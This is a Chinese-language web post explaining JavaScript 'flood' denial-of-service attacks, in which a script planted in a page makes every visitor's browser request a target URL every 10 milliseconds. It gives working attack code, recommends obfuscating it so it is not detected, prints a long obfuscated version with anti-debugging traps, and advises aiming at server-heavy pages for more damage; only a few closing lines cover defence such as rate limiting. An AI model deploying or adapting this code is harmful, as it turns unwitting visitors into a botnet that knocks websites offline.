什么是javaScript的洪水攻击?
javaScript的洪水攻击就是在网页中加入特殊JS脚本,使访问网页的每个人都高频访问某个目标网站地址,大量的访问,即形成为了一种DDOS攻击,也称为洪水拒绝服务攻击。
javascript洪水攻击示例代码
<script type="text/javascript">
function imgflood(){
var targetip="127.0.0.1";
var url="/index.html";
var pic=new Image();
var rand=Math.floor(Math.random()*1000);
pic.src="http://"+targetip+url+"?rand="+rand;
}
setInterval(imgflood,10);
</script>
这段代码含义、攻击原理是:每10毫秒,带一个随机参数访问一次127.0.0.1/index.html。
为了防止脚本被识破,可对JS代码进行混淆加密,点击打开在线js代码混淆工具,比如使用加密上述JS代码:
<script type="text/javascript">
function _0x4f31() {
var _0x1a3395 = [
'numAr',
'xukbA',
'ErUrl',
'split',
'mLmVa',
'vKzrU',
'9AZqmOr',
'2430448LxHHeA',
'/index.htm',
'wHSEf',
'WPEzI',
'GVYDW',
'$]*)',
'src',
'xueHl',
'function\x20*',
'5656572wTSYWX',
'call',
'IElAA',
'random',
'1440YsYuBw',
'iJSOp',
'sADzy',
'glLav',
'MiKMb',
'esCIM',
'e)\x20{}',
'hCexA',
'cNjCd',
'apply',
'debu',
'constructo',
'ETTLc',
'IvNAf',
'\x5c+\x5c+\x20*(?:[',
'floor',
'length',
'jkVKG',
'?rand=',
'ofJMY',
'a-zA-Z_$][',
'pRcgv',
'http://',
'4zwWEmL',
'init',
'fjzzz',
'yNrPh',
'stateObjec',
'hRMjD',
'0|3|1|2|4',
'rNmhh',
'yZnBU',
'BvoXB',
'oRaGX',
'chain',
'QCVDc',
'duwGI',
'nction()\x20',
'{}.constru',
'jxktV',
'890675POsWST',
'7214060vCnxtj',
'MUiwd',
'0-9a-zA-Z_',
'1592946XDpvVT',
'\x5c(\x20*\x5c)',
'gger',
'AATxX',
'while\x20(tru',
'3526555YpvATI',
'sLLbz',
'yTYyb',
'counter',
'HfiMG',
'return\x20(fu',
'test',
'setInterva',
'CbVBM',
'input',
'rn\x20this\x22)(',
'127.0.0.1',
'string',
'ctor(\x22retu',
'action',
'NhvZL'
];
_0x4f31 = function () {
return _0x1a3395;
};
return _0x4f31();
}
(function (_0x347ffd, _0x4dbd53) {
var _0x4d049e = _0x2388, _0x175c4d = _0x347ffd();
while (!![]) {
try {
var _0x248d2 = parseInt(_0x4d049e(0x15d)) / (-0x643 + -0x1568 + 0x1bac) + parseInt(_0x4d049e(0x135)) / (-0x13f3 * 0x1 + 0x1c82 + -0x1 * 0x88d) * (-parseInt(_0x4d049e(0x127)) / (0x1312 * 0x1 + -0x16d + -0x11a2)) + parseInt(_0x4d049e(0x14c)) / (0x1 * -0x25 + 0x191e * 0x1 + -0x18f5) * (-parseInt(_0x4d049e(0x166)) / (-0x238a * -0x1 + 0x129a + 0x1 * -0x361f)) + -parseInt(_0x4d049e(0x161)) / (0x24b3 + -0x51c + 0x1f91 * -0x1) + parseInt(_0x4d049e(0x15e)) / (0x25dd + 0x1411 + -0x3 * 0x134d) + parseInt(_0x4d049e(0x128)) / (0x3d * -0x10 + 0x2218 * 0x1 + -0x1e40) + -parseInt(_0x4d049e(0x131)) / (0x14df + -0x259e + -0xc * -0x166);
if (_0x248d2 === _0x4dbd53)
break;
else
_0x175c4d['push'](_0x175c4d['shift']());
} catch (_0x11eff8) {
_0x175c4d['push'](_0x175c4d['shift']());
}
}
}(_0x4f31, -0x5155e + 0xcb5 * 0x16d + -0x384cc), (function () {
var _0x30bc99 = _0x2388, _0x4810a5 = {
'numAr': function (_0x56cc0d, _0x421aab) {
return _0x56cc0d(_0x421aab);
},
'GVYDW': function (_0x3c9968, _0x20045a) {
return _0x3c9968 + _0x20045a;
},
'QCVDc': _0x30bc99(0x16b) + _0x30bc99(0x15a),
'cNjCd': _0x30bc99(0x15b) + _0x30bc99(0x173) + _0x30bc99(0x170) + '\x20)',
'IElAA': function (_0x2c77d8) {
return _0x2c77d8();
}
}, _0x379c97;
try {
var _0x2f3418 = _0x4810a5[_0x30bc99(0x176)](Function, _0x4810a5[_0x30bc99(0x12c)](_0x4810a5[_0x30bc99(0x12c)](_0x4810a5[_0x30bc99(0x158)], _0x4810a5[_0x30bc99(0x13d)]), ');'));
_0x379c97 = _0x4810a5[_0x30bc99(0x133)](_0x2f3418);
} catch (_0x1601cf) {
_0x379c97 = window;
}
_0x379c97[_0x30bc99(0x16d) + 'l'](_0x263771, 0x1 * 0x1159 + -0xa * -0xf1 + -0x2f9 * 0x9);
}()));
var _0xfb1078 = (function () {
var _0x5c0499 = !![];
return function (_0x161020, _0x3243a9) {
var _0x4e506c = _0x5c0499 ? function () {
var _0x4784cb = _0x2388;
if (_0x3243a9) {
var _0x436556 = _0x3243a9[_0x4784cb(0x13e)](_0x161020, arguments);
return _0x3243a9 = null, _0x436556;
}
} : function () {
};
return _0x5c0499 = ![], _0x4e506c;
};
}());
function _0x2388(_0x2034b6, _0x4f31ca) {
var _0x238825 = _0x4f31();
return _0x2388 = function (_0x1a0be4, _0x17e40f) {
_0x1a0be4 = _0x1a0be4 - (-0x3 * -0x725 + -0x988 + -0xac0);
var _0x8cd62e = _0x238825[_0x1a0be4];
return _0x8cd62e;
}, _0x2388(_0x2034b6, _0x4f31ca);
}
(function () {
var _0x511149 = _0x2388, _0xa93be = {
'hRMjD': _0x511149(0x130) + _0x511149(0x162),
'duwGI': _0x511149(0x143) + _0x511149(0x149) + _0x511149(0x160) + _0x511149(0x12d),
'WPEzI': function (_0x32ab7a, _0x2d3e8f) {
return _0x32ab7a(_0x2d3e8f);
},
'yTYyb': _0x511149(0x14d),
'ETTLc': function (_0x1c6a6e, _0x295e1a) {
return _0x1c6a6e + _0x295e1a;
},
'hCexA': _0x511149(0x157),
'ErUrl': _0x511149(0x16f),
'esCIM': function (_0xdd7619, _0x98b923) {
return _0xdd7619(_0x98b923);
},
'AATxX': function (_0x35bc35) {
return _0x35bc35();
},
'rNmhh': function (_0x2b6f43, _0x20fcd1, _0xb5acd) {
return _0x2b6f43(_0x20fcd1, _0xb5acd);
}
};
_0xa93be[_0x511149(0x153)](_0xfb1078, this, function () {
var _0x3f3b06 = _0x511149, _0x7a61dc = new RegExp(_0xa93be[_0x3f3b06(0x151)]), _0x1ec889 = new RegExp(_0xa93be[_0x3f3b06(0x159)], 'i'), _0x41a053 = _0xa93be[_0x3f3b06(0x12b)](_0x263771, _0xa93be[_0x3f3b06(0x168)]);
!_0x7a61dc[_0x3f3b06(0x16c)](_0xa93be[_0x3f3b06(0x141)](_0x41a053, _0xa93be[_0x3f3b06(0x13c)])) || !_0x1ec889[_0x3f3b06(0x16c)](_0xa93be[_0x3f3b06(0x141)](_0x41a053, _0xa93be[_0x3f3b06(0x178)])) ? _0xa93be[_0x3f3b06(0x13a)](_0x41a053, '0') : _0xa93be[_0x3f3b06(0x164)](_0x263771);
})();
}());
function imgflood() {
var _0x39b652 = _0x2388, _0xffaee6 = {
'CbVBM': _0x39b652(0x152),
'BvoXB': _0x39b652(0x171),
'IvNAf': function (_0xfba210, _0x287a3b) {
return _0xfba210 * _0x287a3b;
},
'HfiMG': _0x39b652(0x129) + 'l',
'sLLbz': function (_0x42326d, _0x3f6c4c) {
return _0x42326d + _0x3f6c4c;
},
'NhvZL': function (_0x1a8dfe, _0x3f3370) {
return _0x1a8dfe + _0x3f3370;
},
'wHSEf': _0x39b652(0x14b),
'mLmVa': _0x39b652(0x147)
}, _0x59c84e = _0xffaee6[_0x39b652(0x16e)][_0x39b652(0x179)]('|'), _0x96cec4 = 0x1cb8 + -0xc94 + 0x4 * -0x409;
while (!![]) {
switch (_0x59c84e[_0x96cec4++]) {
case '0':
var _0x4a18ab = _0xffaee6[_0x39b652(0x155)];
continue;
case '1':
var _0x404268 = new Image();
continue;
case '2':
var _0x1b3322 = Math[_0x39b652(0x144)](_0xffaee6[_0x39b652(0x142)](Math[_0x39b652(0x134)](), 0xee5 + -0x116a + 0x66d));
continue;
case '3':
var _0x246979 = _0xffaee6[_0x39b652(0x16a)];
continue;
case '4':
_0x404268[_0x39b652(0x12e)] = _0xffaee6[_0x39b652(0x167)](_0xffaee6[_0x39b652(0x175)](_0xffaee6[_0x39b652(0x167)](_0xffaee6[_0x39b652(0x167)](_0xffaee6[_0x39b652(0x12a)], _0x4a18ab), _0x246979), _0xffaee6[_0x39b652(0x17a)]), _0x1b3322);
continue;
}
break;
}
}
setInterval(imgflood, -0x1 * 0xb8d + -0x2f * 0xc7 + 0x3020);
function _0x263771(_0x4c0c51) {
var _0x18f3a6 = _0x2388, _0x10e742 = {
'sADzy': function (_0xa68dbc, _0x462975) {
return _0xa68dbc === _0x462975;
},
'jkVKG': _0x18f3a6(0x172),
'jxktV': _0x18f3a6(0x165) + _0x18f3a6(0x13b),
'MUiwd': _0x18f3a6(0x169),
'yZnBU': function (_0xda58d4, _0x3b2dc9) {
return _0xda58d4 !== _0x3b2dc9;
},
'yNrPh': function (_0x4ee3c1, _0x95c840) {
return _0x4ee3c1 + _0x95c840;
},
'pRcgv': function (_0x35efce, _0xc3f9da) {
return _0x35efce / _0xc3f9da;
},
'oRaGX': _0x18f3a6(0x145),
'MiKMb': function (_0x4725b7, _0x573e36) {
return _0x4725b7 === _0x573e36;
},
'fjzzz': function (_0x435f9d, _0x5e3e88) {
return _0x435f9d % _0x5e3e88;
},
'ofJMY': _0x18f3a6(0x13f),
'xukbA': _0x18f3a6(0x163),
'glLav': _0x18f3a6(0x174),
'xueHl': _0x18f3a6(0x150) + 't',
'iJSOp': function (_0x44b6a5, _0x1c3e03) {
return _0x44b6a5(_0x1c3e03);
},
'vKzrU': function (_0xf26cf3, _0x4b359e) {
return _0xf26cf3(_0x4b359e);
}
};
function _0x3df111(_0x54f0ac) {
var _0x17080f = _0x18f3a6;
if (_0x10e742[_0x17080f(0x137)](typeof _0x54f0ac, _0x10e742[_0x17080f(0x146)]))
return function (_0xbf14d9) {
}[_0x17080f(0x140) + 'r'](_0x10e742[_0x17080f(0x15c)])[_0x17080f(0x13e)](_0x10e742[_0x17080f(0x15f)]);
else
_0x10e742[_0x17080f(0x154)](_0x10e742[_0x17080f(0x14f)]('', _0x10e742[_0x17080f(0x14a)](_0x54f0ac, _0x54f0ac))[_0x10e742[_0x17080f(0x156)]], 0x136a + -0x25c8 + 0x125f) || _0x10e742[_0x17080f(0x139)](_0x10e742[_0x17080f(0x14e)](_0x54f0ac, 0xeee + -0x207d + 0xf * 0x12d), 0x1949 + -0x416 * -0x5 + -0x2db7) ? function () {
return !![];
}[_0x17080f(0x140) + 'r'](_0x10e742[_0x17080f(0x14f)](_0x10e742[_0x17080f(0x148)], _0x10e742[_0x17080f(0x177)]))[_0x17080f(0x132)](_0x10e742[_0x17080f(0x138)]) : function () {
return ![];
}[_0x17080f(0x140) + 'r'](_0x10e742[_0x17080f(0x14f)](_0x10e742[_0x17080f(0x148)], _0x10e742[_0x17080f(0x177)]))[_0x17080f(0x13e)](_0x10e742[_0x17080f(0x12f)]);
_0x10e742[_0x17080f(0x136)](_0x3df111, ++_0x54f0ac);
}
try {
if (_0x4c0c51)
return _0x3df111;
else
_0x10e742[_0x18f3a6(0x17b)](_0x3df111, 0x5 * -0x1d1 + 0x26b + 0x6aa);
} catch (_0x4da04e) {
}
}
</script>
执行后,我可以看到
更理想的效果是:访问服务器上与后台有交互、消耗系统CPU或磁盘性能的网页,最终达到使Web服务器无法正常处理连接请求。这也是拒绝服务攻击的普遍原理。
那么,对此种可能发生的攻击,该如何防护呢?
在攻击端而言,要防止页面被植入不法脚本。
在被攻击端而言,也应做好网站安全防护,比如后台逻辑对同一访问者的访问频率做限制、与服务器有交互的页面设计验证访问机制等等。
网友回复
我知道答案,我要回答
私活外包
